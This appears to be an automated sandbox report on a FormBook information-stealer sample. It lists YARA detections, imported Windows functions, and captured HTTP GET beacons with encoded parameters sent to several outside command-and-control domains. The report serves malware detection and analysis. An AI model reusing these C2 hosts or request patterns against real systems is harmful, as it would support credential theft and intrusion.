          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://via.placeholder.com/100
          Source: unknownDNS traffic detected: queries for: www.yr-golf.com
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1Host: www.yr-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1Host: www.assisttm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1Host: www.fastbest.hostConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Y1p8VPvyU2.exe, 00000000.00000002.305416904.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404E07

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Y1p8VPvyU2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_004060430_2_00406043
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_004046180_2_00404618
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040681A0_2_0040681A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000E44F0_2_1000E44F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000E8670_2_1000E867
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000EC9C0_2_1000EC9C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000F0D10_2_1000F0D1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100170E60_2_100170E6
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100191A30_2_100191A3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021DE20_2_10021DE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021DF10_2_10021DF1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10017E000_2_10017E00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1001424E0_2_1001424E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100176580_2_10017658
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000DF5B0_2_1000DF5B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10016B740_2_10016B74
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004011751_2_00401175
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041C9971_2_0041C997
